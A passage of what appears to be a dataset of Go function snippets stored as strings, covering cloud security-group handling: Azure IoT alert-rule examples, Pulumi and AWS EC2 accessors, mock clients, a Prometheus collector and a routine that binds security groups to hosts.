to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.AmqpD2CMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device to cloud messages (AMQP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device to cloud messages (AMQP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"AmqpD2CMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.MqttD2CMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device to cloud messages (MQTT protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device to cloud messages (MQTT protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"MqttD2CMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.HTTPD2CMessagesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device to cloud messages (HTTP protocol) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device to cloud messages (HTTP protocol) is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"HttpD2CMessagesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.DirectMethodInvokesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of direct method invokes in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of direct method invokes is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"DirectMethodInvokesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.FailedLocalLoginsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of failed local logins on the device in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of failed local logins is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"FailedLocalLoginsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.FileUploadsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of file uploads from the device to the cloud in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of file uploads is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"FileUploadsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.QueuePurgesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of device queue purges in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of device queue purges is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"QueuePurgesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.TwinUpdatesNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number of twin updates (by the device or the service) in the time window is not in the allowed range\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of twin updates is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"TwinUpdatesNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t\t},\n\t// \t\t\t&armsecurity.UnauthorizedOperationsNotInAllowedRange{\n\t// \t\t\t\tDescription: to.Ptr(\"Get an alert when the number unauthorized operations in the time window is not in the allowed range. Unauthorized operations are operations that affect the device (or done by it) that fail because of an unauthorized error\"),\n\t// \t\t\t\tDisplayName: to.Ptr(\"Number of unauthorized operations is not in allowed range\"),\n\t// \t\t\t\tIsEnabled: to.Ptr(false),\n\t// \t\t\t\tRuleType: to.Ptr(\"UnauthorizedOperationsNotInAllowedRange\"),\n\t// \t\t\t\tMaxThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tMinThreshold: to.Ptr[int32](0),\n\t// \t\t\t\tTimeWindowSize: to.Ptr(\"PT15M\"),\n\t// \t\t}},\n\t// \t},\n\t// }\n}", "func (o EnvironmentNetworkConfigurationOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v EnvironmentNetworkConfiguration) []string { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (c *MockNetworkSecurityGroupsClient) Get(ctx context.Context, resourceGroupName string, nsgName string) (*network.SecurityGroup, error) {\n\tasg, ok := c.NSGs[nsgName]\n\tif !ok {\n\t\treturn nil, nil\n\t}\n\treturn &asg, nil\n}", "func (c *MockNetworkSecurityGroupsClient) List(ctx context.Context, resourceGroupName string) ([]network.SecurityGroup, error) {\n\tvar l []network.SecurityGroup\n\tfor _, nsg := range c.NSGs {\n\t\tl = append(l, nsg)\n\t}\n\treturn l, nil\n}", "func NewSecurityGroup() *SecurityGroup {\n\tthis := SecurityGroup{}\n\treturn &this\n}", "func (v *Vps) PopulateSecurityGroups(os *OpenStack) error {\n\tvar err error\n\n\t// Security Groups\n\tresult := servers.GetResult{}\n\turl := os.Compute.ServiceURL(\"servers\", v.ID, \"os-security-groups\")\n\t_, err = os.Compute.Get(url, &result.Body, nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tvar resp struct {\n\t\tSecurityGroups []secgroups.SecurityGroup `mapstructure:\"security_groups\"`\n\t}\n\n\tif err = mapstructure.Decode(result.Body, &resp); err != nil {\n\t\treturn err\n\t}\n\tv.SecurityGroups = resp.SecurityGroups\n\n\treturn nil\n}", "func GetSecurityGroup(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *SecurityGroupState, opts ...pulumi.ResourceOption) (*SecurityGroup, error) {\n\tvar resource SecurityGroup\n\terr := ctx.ReadResource(\"aws:elasticache/securityGroup:SecurityGroup\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (o ClusterOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *Cluster) pulumi.StringArrayOutput { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (c *MockAzureCloud) NetworkSecurityGroup() azure.NetworkSecurityGroupsClient {\n\treturn c.NetworkSecurityGroupsClient\n}", "func (provider *ResourceProvider) SecurityGroup(id string) (*reachAWS.SecurityGroup, error) {\n\tinput := &ec2.DescribeSecurityGroupsInput{\n\t\tGroupIds: []*string{\n\t\t\taws.String(id),\n\t\t},\n\t}\n\tresult, err := provider.ec2.DescribeSecurityGroups(input)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif err = ensureSingleResult(len(result.SecurityGroups), \"security group\", id); err != nil {\n\t\treturn nil, err\n\t}\n\n\tsecurityGroup := newSecurityGroupFromAPI(result.SecurityGroups[0])\n\treturn &securityGroup, nil\n}", "func (c *ClientWithResponses) ListSecurityGroupsWithResponse(ctx context.Context) (*ListSecurityGroupsResponse, error) {\n\trsp, err := c.ListSecurityGroups(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn ParseListSecurityGroupsResponse(rsp)\n}", "func (o SecurityGroupRuleOutput) SecurityGroupId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *SecurityGroupRule) pulumi.StringOutput { return v.SecurityGroupId }).(pulumi.StringOutput)\n}", "func (s *NASSecurityGroup) SetSecurityGroups(v []*SecurityGroup) *NASSecurityGroup {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (o EnvironmentNetworkConfigurationPtrOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *EnvironmentNetworkConfiguration) []string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.SecurityGroupIds\n\t}).(pulumi.StringArrayOutput)\n}", "func NewListSecurityGroupsRequest(server string) (*http.Request, error) {\n\tvar err error\n\n\tqueryUrl, err := url.Parse(server)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tbasePath := fmt.Sprintf(\"/security-group\")\n\tif basePath[0] == '/' {\n\t\tbasePath = basePath[1:]\n\t}\n\n\tqueryUrl, err = queryUrl.Parse(basePath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq, err := http.NewRequest(\"GET\", queryUrl.String(), nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn req, nil\n}", "func (c *Client) DisassociateSecurityGroups(request *DisassociateSecurityGroupsRequest) (response *DisassociateSecurityGroupsResponse, err error) {\n return c.DisassociateSecurityGroupsWithContext(context.Background(), request)\n}", "func (s *applicationSecurityGroupLister) ApplicationSecurityGroups(namespace string) ApplicationSecurityGroupNamespaceLister {\n\treturn applicationSecurityGroupNamespaceLister{indexer: s.indexer, namespace: namespace}\n}", "func (o SecurityGroupIngressOutput) SecurityGroupId() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v SecurityGroupIngress) *string { return v.SecurityGroupId }).(pulumi.StringPtrOutput)\n}", "func SecurityGroups(groups ...string) RequestOptionFunc {\n\treturn func(body *RequestBody) error {\n\t\tbody.SecurityGroup = groups\n\t\treturn nil\n\t}\n}", "func (r *ScheduleSchedulingGroupsCollectionRequest) Get(ctx context.Context) ([]SchedulingGroup, error) {\n\treturn r.GetN(ctx, 0)\n}", "func (o *SecurityGroup) GetSecurityGroupName() string {\n\tif o == nil || o.SecurityGroupName == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroupName\n}", "func (c *Client) ListKubernetesSecurityGroups(ctx context.Context, vpcID, clusterName string) ([]string, error) {\n\tgroups, err := c.EC2.DescribeSecurityGroupsWithContext(ctx, &ec2.DescribeSecurityGroupsInput{\n\t\tFilters: []*ec2.Filter{\n\t\t\t{\n\t\t\t\tName: aws.String(\"vpc-id\"),\n\t\t\t\tValues: []*string{aws.String(vpcID)},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: aws.String(\"tag-key\"),\n\t\t\t\tValues: []*string{aws.String(fmt.Sprintf(\"kubernetes.io/cluster/%s\", clusterName))},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: aws.String(\"tag-value\"),\n\t\t\t\tValues: []*string{aws.String(\"owned\")},\n\t\t\t},\n\t\t},\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar results []string\n\tfor _, group := range groups.SecurityGroups {\n\t\tresults = append(results, *group.GroupId)\n\t}\n\n\treturn results, nil\n}", "func (o *FiltersSecurityGroup) GetSecurityGroupNamesOk() (*[]string, bool) {\n\tif o == nil || o.SecurityGroupNames == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroupNames, true\n}", "func (o ClusterOutput) SecurityGroupNames() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *Cluster) pulumi.StringArrayOutput { return v.SecurityGroupNames }).(pulumi.StringArrayOutput)\n}", "func (o EcsLaunchTemplateOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *EcsLaunchTemplate) pulumi.StringArrayOutput { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func NewSecurityGroupCollector(logger log.Logger, client *scw.Client, failures *prometheus.CounterVec, duration *prometheus.HistogramVec, cfg config.Target) *SecurityGroupCollector {\n\tif failures != nil {\n\t\tfailures.WithLabelValues(\"security_group\").Add(0)\n\t}\n\n\tlabels := []string{\"id\", \"name\", \"zone\", \"org\", \"project\"}\n\tcollector := &SecurityGroupCollector{\n\t\tclient: client,\n\t\tinstance: instance.NewAPI(client),\n\t\tlogger: log.With(logger, \"collector\", \"security_group\"),\n\t\tfailures: failures,\n\t\tduration: duration,\n\t\tconfig: cfg,\n\n\t\tDefined: prometheus.NewDesc(\n\t\t\t\"scw_security_group_defined\",\n\t\t\t\"Constant value of 1 that this security group is defined\",\n\t\t\tlabels,\n\t\t\tnil,\n\t\t),\n\t\tEnableDefault: prometheus.NewDesc(\n\t\t\t\"scw_security_group_enable_default\",\n\t\t\t\"1 if the security group is enabled by default, 0 otherwise\",\n\t\t\tlabels,\n\t\t\tnil,\n\t\t),\n\t\tProjectDefault: prometheus.NewDesc(\n\t\t\t\"scw_security_group_project_default\",\n\t\t\t\"1 if the security group is an project default, 0 otherwise\",\n\t\t\tlabels,\n\t\t\tnil,\n\t\t),\n\t\tStateful: prometheus.NewDesc(\n\t\t\t\"scw_security_group_stateful\",\n\t\t\t\"1 if the security group is stateful by default, 0 otherwise\",\n\t\t\tlabels,\n\t\t\tnil,\n\t\t),\n\t\tInboundDefault: prometheus.NewDesc(\n\t\t\t\"scw_security_group_inbound_default_policy\",\n\t\t\t\"1 if the security group inbound default policy is accept, 0 otherwise\",\n\t\t\tlabels,\n\t\t\tnil,\n\t\t),\n\t\tOutboundDefault: prometheus.NewDesc(\n\t\t\t\"scw_security_group_outbound_default_policy\",\n\t\t\t\"1 if the security group outbound default policy is accept, 0 otherwise\",\n\t\t\tlabels,\n\t\t\tnil,\n\t\t),\n\t\tServers: prometheus.NewDesc(\n\t\t\t\"scw_security_group_servers_count\",\n\t\t\t\"Number of servers attached to the security group\",\n\t\t\tlabels,\n\t\t\tnil,\n\t\t),\n\t\tCreated: prometheus.NewDesc(\n\t\t\t\"scw_security_group_created_timestamp\",\n\t\t\t\"Timestamp when the security group have been created\",\n\t\t\tlabels,\n\t\t\tnil,\n\t\t),\n\t\tModified: prometheus.NewDesc(\n\t\t\t\"scw_security_group_modified_timestamp\",\n\t\t\t\"Timestamp when the security group have been modified\",\n\t\t\tlabels,\n\t\t\tnil,\n\t\t),\n\t}\n\n\tif cfg.Org != \"\" {\n\t\tcollector.org = scw.StringPtr(cfg.Org)\n\t}\n\n\tif cfg.Project != \"\" {\n\t\tcollector.project = scw.StringPtr(cfg.Project)\n\t}\n\n\treturn collector\n}", "func (in *SecurityGroup) DeepCopy() *SecurityGroup {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(SecurityGroup)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (o *FiltersVmGroup) HasSecurityGroupIds() bool {\n\tif o != nil && o.SecurityGroupIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o OceanOutput) SecurityGroupIds() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *Ocean) pulumi.StringArrayOutput { return v.SecurityGroupIds }).(pulumi.StringArrayOutput)\n}", "func (o EcsLaunchTemplateOutput) SecurityGroupId() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *EcsLaunchTemplate) pulumi.StringPtrOutput { return v.SecurityGroupId }).(pulumi.StringPtrOutput)\n}", "func (o *SecurityGroup) HasSecurityGroupId() bool {\n\tif o != nil && o.SecurityGroupId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (service *Service) GetAll() (*[]CloudSecurityGroupResponse, *http.Response, error) {\n\tv := new([]CloudSecurityGroupResponse)\n\tresp, err := service.Client.NewRequestDo(\"GET\", awsSgResourcePath, nil, nil, v)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treturn v, resp, nil\n}", "func (o *FiltersSecurityGroup) HasSecurityGroupIds() bool {\n\tif o != nil && o.SecurityGroupIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func Find(ec2Client aws.EC2API, nameTags []*string) ([]*SecurityGroup, error) {\n\tfilters := []*ec2.Filter{\n\t\t&ec2.Filter{\n\t\t\tName: to.Strp(\"tag-key\"),\n\t\t\tValues: []*string{to.Strp(\"Name\")},\n\t\t},\n\t\t&ec2.Filter{\n\t\t\tName: to.Strp(\"tag-value\"),\n\t\t\tValues: nameTags,\n\t\t},\n\t}\n\n\toutput, err := ec2Client.DescribeSecurityGroups(&ec2.DescribeSecurityGroupsInput{\n\t\tFilters: filters,\n\t\tMaxResults: to.Int64p(5), // Smallest allowed value returns\n\t})\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsgs := newSGs(output.SecurityGroups)\n\tswitch len(sgs) {\n\tcase len(nameTags):\n\t\treturn sgs, nil\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"Number of Security Groups %v/%v\", len(sgs), len(nameTags))\n\t}\n}", "func (c *Client) ListKubernetesSecurityGroups(vpcID, clusterName string) ([]string, error) {\n\tgroups, err := c.EC2.DescribeSecurityGroups(&ec2.DescribeSecurityGroupsInput{\n\t\tFilters: []*ec2.Filter{\n\t\t\t{\n\t\t\t\tName: aws.String(\"vpc-id\"),\n\t\t\t\tValues: []*string{aws.String(vpcID)},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: aws.String(\"tag-key\"),\n\t\t\t\tValues: []*string{aws.String(fmt.Sprintf(\"kubernetes.io/cluster/%s\", clusterName))},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: aws.String(\"tag-value\"),\n\t\t\t\tValues: []*string{aws.String(\"owned\")},\n\t\t\t},\n\t\t},\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresults := []string{}\n\tfor _, group := range groups.SecurityGroups {\n\t\tresults = append(results, *group.GroupId)\n\t}\n\n\treturn results, nil\n}", "func (clients *Clients) NewSecurityGroupsClient() network.SecurityGroupsClient {\n\n\tcreds := clients.Credential\n\n\tclient := network.NewSecurityGroupsClient(*&creds.ServicePrincipal.SubscriptionID)\n\tclient.Authorizer = creds.Authorizer\n\treturn client\n}", "func (o StudioOutput) WorkspaceSecurityGroupId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *Studio) pulumi.StringOutput { return v.WorkspaceSecurityGroupId }).(pulumi.StringOutput)\n}", "func GetSecurityGroupConfig(s *ec2.SecurityGroup) []AWSResourceConfig {\n\tcf := SecurityGroupConfig{\n\t\tConfig: Config{\n\t\t\tName: s.GroupName,\n\t\t\tTags: s.Tags,\n\t\t},\n\t\tGroupName: s.GroupName,\n\t\tGroupDescription: s.GroupDescription,\n\t}\n\n\tingresses := make([]IngressEgress, 0)\n\tfor _, i := range s.SecurityGroupIngress {\n\t\tingress := IngressEgress{\n\t\t\tIPProtocol: i.IpProtocol,\n\t\t\tDescription: i.Description,\n\t\t\tCidrIP: []string{i.CidrIp},\n\t\t\tCidrIpv6: []string{i.CidrIpv6},\n\t\t\tFromPort: i.FromPort,\n\t\t\tToPort: i.ToPort,\n\t\t}\n\t\tingresses = append(ingresses, ingress)\n\t}\n\tcf.SecurityGroupIngress = ingresses\n\n\tegresses := make([]IngressEgress, 0)\n\tfor _, e := range s.SecurityGroupEgress {\n\t\tegress := IngressEgress{\n\t\t\tIPProtocol: e.IpProtocol,\n\t\t\tDescription: e.Description,\n\t\t\tCidrIP: []string{e.CidrIp},\n\t\t\tCidrIpv6: []string{e.CidrIpv6},\n\t\t\tFromPort: e.FromPort,\n\t\t\tToPort: e.ToPort,\n\t\t}\n\t\tegresses = append(egresses, egress)\n\t}\n\tcf.SecurityGroupEgress = egresses\n\n\treturn []AWSResourceConfig{{\n\t\tResource: cf,\n\t\tMetadata: s.AWSCloudFormationMetadata,\n\t}}\n}", "func (c *Client) GetSecurityGroup(ctx context.Context, zone, id string) (*SecurityGroup, error) {\n\tresp, err := c.GetSecurityGroupWithResponse(ctx, id)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsecurityGroup := securityGroupFromAPI(resp.JSON200)\n\tsecurityGroup.c = c\n\tsecurityGroup.zone = zone\n\n\treturn securityGroup, nil\n}", "func (o *SecurityGroup) SetSecurityGroupId(v string) {\n\to.SecurityGroupId = &v\n}", "func (s applicationSecurityGroupNamespaceLister) Get(name string) (*v1alpha1.ApplicationSecurityGroup, error) {\n\tobj, exists, err := s.indexer.GetByKey(s.namespace + \"/\" + name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif !exists {\n\t\treturn nil, errors.NewNotFound(v1alpha1.Resource(\"applicationsecuritygroup\"), name)\n\t}\n\treturn obj.(*v1alpha1.ApplicationSecurityGroup), nil\n}", "func (m *Group) GetSecurityEnabled()(*bool) {\n return m.securityEnabled\n}", "func (mr *MockSecurityGroupServiceIfaceMockRecorder) ListSecurityGroups(p interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListSecurityGroups\", reflect.TypeOf((*MockSecurityGroupServiceIface)(nil).ListSecurityGroups), p)\n}", "func (instance *Host) setSecurityGroups(ctx context.Context, req abstract.HostRequest, defaultSubnet resources.Subnet) fail.Error {\n\tsvc := instance.Service()\n\tif req.Single {\n\t\thostID, err := instance.GetID()\n\t\tif err != nil {\n\t\t\treturn fail.ConvertError(err)\n\t\t}\n\t\tfor k := range req.SecurityGroupIDs {\n\t\t\tif k != \"\" {\n\t\t\t\tlogrus.WithContext(ctx).Infof(\"Binding security group with id %s to host %s\", k, hostID)\n\t\t\t\txerr := svc.BindSecurityGroupToHost(ctx, k, hostID)\n\t\t\t\txerr = debug.InjectPlannedFail(xerr)\n\t\t\t\tif xerr != nil {\n\t\t\t\t\treturn xerr\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n\n\txerr := instance.Alter(ctx, func(clonable data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Alter(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) (finnerXErr fail.Error) {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\t// get default Subnet core data\n\t\t\tvar (\n\t\t\t\tdefaultAbstractSubnet *abstract.Subnet\n\t\t\t\tdefaultSubnetID string\n\t\t\t)\n\t\t\tinnerXErr := defaultSubnet.Inspect(ctx,\n\t\t\t\tfunc(clonable data.Clonable, _ *serialize.JSONProperties) fail.Error {\n\t\t\t\t\tvar ok bool\n\t\t\t\t\tdefaultAbstractSubnet, ok = clonable.(*abstract.Subnet)\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\treturn fail.InconsistentError(\"'*abstract.Subnet' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t\t\t}\n\n\t\t\t\t\tdefaultSubnetID = defaultAbstractSubnet.ID\n\t\t\t\t\treturn nil\n\t\t\t\t},\n\t\t\t)\n\t\t\tif innerXErr != nil {\n\t\t\t\treturn innerXErr\n\t\t\t}\n\n\t\t\tvar gwsg, pubipsg, lansg resources.SecurityGroup\n\n\t\t\t// Apply Security Group for gateways in default Subnet\n\t\t\tif req.IsGateway && defaultAbstractSubnet.GWSecurityGroupID != \"\" {\n\t\t\t\tgwsg, innerXErr = LoadSecurityGroup(ctx, svc, defaultAbstractSubnet.GWSecurityGroupID)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to query Subnet '%s' Security Group '%s'\", defaultSubnet.GetName(), defaultAbstractSubnet.GWSecurityGroupID)\n\t\t\t\t}\n\n\t\t\t\tinnerXErr = gwsg.BindToHost(ctx, instance, resources.SecurityGroupEnable, resources.MarkSecurityGroupAsSupplemental)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to apply Subnet's GW Security Group for gateway '%s' on Host '%s'\", gwsg.GetName(), req.ResourceName)\n\t\t\t\t}\n\n\t\t\t\tdefer func() {\n\t\t\t\t\tif finnerXErr != nil && !req.KeepOnFailure {\n\t\t\t\t\t\tderr := gwsg.UnbindFromHost(cleanupContextFrom(ctx), instance)\n\t\t\t\t\t\tif derr != nil {\n\t\t\t\t\t\t\t_ = finnerXErr.AddConsequence(fail.Wrap(derr, \"cleaning up on %s, failed to unbind Security Group '%s' from Host '%s'\", ActionFromError(finnerXErr), gwsg.GetName(), req.ResourceName))\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}()\n\n\t\t\t\tgwid, err := gwsg.GetID()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn fail.ConvertError(err)\n\t\t\t\t}\n\n\t\t\t\titem := &propertiesv1.SecurityGroupBond{\n\t\t\t\t\tID: gwid,\n\t\t\t\t\tName: gwsg.GetName(),\n\t\t\t\t\tDisabled: false,\n\t\t\t\t\tFromSubnet: true,\n\t\t\t\t}\n\t\t\t\thsgV1.ByID[item.ID] = item\n\t\t\t\thsgV1.ByName[item.Name] = item.ID\n\t\t\t}\n\n\t\t\t// Apply Security Group for hosts with public IP in default Subnet\n\t\t\tif (req.IsGateway || req.PublicIP) && defaultAbstractSubnet.PublicIPSecurityGroupID != \"\" {\n\t\t\t\tpubipsg, innerXErr = LoadSecurityGroup(ctx, svc, defaultAbstractSubnet.PublicIPSecurityGroupID)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to query Subnet '%s' Security Group with ID %s\", defaultSubnet.GetName(), defaultAbstractSubnet.PublicIPSecurityGroupID)\n\t\t\t\t}\n\n\t\t\t\tinnerXErr = pubipsg.BindToHost(ctx, instance, resources.SecurityGroupEnable, resources.MarkSecurityGroupAsSupplemental)\n\t\t\t\tif innerXErr != nil {\n\t\t\t\t\treturn fail.Wrap(innerXErr, \"failed to apply Subnet's Public Security Group for gateway '%s' on Host '%s'\", pubipsg.GetName(), req.ResourceName)\n\t\t\t\t}\n\n\t\t\t\tdefer func() {\n\t\t\t\t\tif finnerXErr != nil && !req.KeepOnFailure {\n\t\t\t\t\t\tderr := pubipsg.UnbindFromHost(cleanupContextFrom(ctx), instance)\n\t\t\t\t\t\tif derr != nil {\n\t\t\t\t\t\t\t_ = finnerXErr.AddConsequence(fail.Wrap(derr, \"cleaning up on %s, failed to unbind Security Group '%s' from Host '%s'\", ActionFromError(finnerXErr), pubipsg.GetName(), req.ResourceName))\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}()\n\n\t\t\t\tpubID, err := pubipsg.GetID()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn fail.ConvertError(err)\n\t\t\t\t}\n\n\t\t\t\titem := &propertiesv1.SecurityGroupBond{\n\t\t\t\t\tID: pubID,\n\t\t\t\t\tName: pubipsg.GetName(),\n\t\t\t\t\tDisabled: false,\n\t\t\t\t\tFromSubnet: true,\n\t\t\t\t}\n\t\t\t\thsgV1.ByID[item.ID] = item\n\t\t\t\thsgV1.ByName[item.Name] = item.ID\n\t\t\t}\n\n\t\t\t// Apply internal Security Group of each other subnets\n\t\t\tdefer func() {\n\t\t\t\tif finnerXErr != nil && !req.KeepOnFailure {\n\t\t\t\t\tvar (\n\t\t\t\t\t\tsg resources.SecurityGroup\n\t\t\t\t\t\tderr error\n\t\t\t\t\t\terrs []error\n\t\t\t\t\t)\n\t\t\t\t\tfor _, v := range req.Subnets {\n\t\t\t\t\t\tif v.ID == defaultSubnetID {\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tsubnetInstance, deeperXErr := LoadSubnet(cleanupContextFrom(ctx), svc, \"\", v.ID)\n\t\t\t\t\t\tif deeperXErr != nil {\n\t\t\t\t\t\t\t_ = innerXErr.AddConsequence(deeperXErr)\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tsgName := sg.GetName()\n\t\t\t\t\t\tdeeperXErr = subnetInstance.Inspect(cleanupContextFrom(ctx), func(\n\t\t\t\t\t\t\tclonable data.Clonable, _ 